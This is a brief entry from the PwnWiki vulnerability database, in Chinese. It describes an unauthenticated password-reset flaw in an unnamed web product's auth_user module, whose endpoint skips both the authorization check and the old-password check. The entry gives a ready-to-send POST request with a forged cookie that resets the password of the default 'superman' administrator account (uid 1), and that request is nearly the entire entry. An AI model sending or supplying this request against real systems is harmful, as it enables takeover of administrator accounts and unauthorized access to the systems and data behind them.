免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
POC
无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd,接口未授权访问,造成直接修改任意用户密 码,默认superman账户uid为1
POST /?module=auth_user&action=mod_edit_pwd Cookie: username=superman; uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1
免费、自由、人人可编辑的漏洞库--PwnWiki.com
